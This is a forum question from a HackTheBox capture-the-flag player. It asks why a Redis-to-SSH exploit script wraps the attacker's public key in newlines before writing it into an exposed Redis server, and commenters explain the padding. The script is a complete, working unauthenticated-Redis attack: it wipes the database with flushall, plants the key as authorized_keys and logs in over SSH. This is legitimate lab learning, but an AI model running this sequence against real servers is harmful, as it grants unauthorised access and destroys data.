# Redis Public Keys

Tags: bash, ssh, redis

I am working on HackTheBox and have come across a question that Google has yet to answer. The current script looks like so:

```
#!/bin/bash

rm /root/.ssh/id*

ssh-keygen -t rsa

(echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt"

redis-cli -h 10.10.10.160 flushall

cat "/root/Desktop/postmanKey.txt" | redis-cli -h 10.10.10.160 -x set bb

redis-cli -h 10.10.10.160 save

redis-cli -h 10.10.10.160 set dbfilename "authorized_keys"

redis-cli -h 10.10.10.160 save

ssh -i "/root/.ssh/id_rsa" redis@10.10.10.160
```

I understand all of it except for one thing. Why do we do (echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt"  to generate a public key with 2 trailing and 2 following newlines? I have done some tinkering and quite a few Google searches but I have yet to turn up the reason why this is necessary. If I push the file to the server without the newlines and then attempt to connect via ssh, I am unable to. My only thought is maybe this is something to do with the common format of private keys:

-----BEGIN RSA PRIVATE KEY-----

....

-----END RSA PRIVATE KEY-----

however, we are connecting with a private key, but pushing to the server a public key... hence why I am lost. Thank you for any information!

Comment: Have you tried viewing the difference between the file redis writes with and without them?

Comment: Thanks. I'm still not exactly certain why this works, however, I will take it as an 'as is' thing. The file redis writes (when not using new lines) strings everything including the key together, therefore making it impossible (for redis) to discern when the key starts and ends. The script will execute and give access by using just one new line. So I'm assuming using two is just for extra 'what if' padding.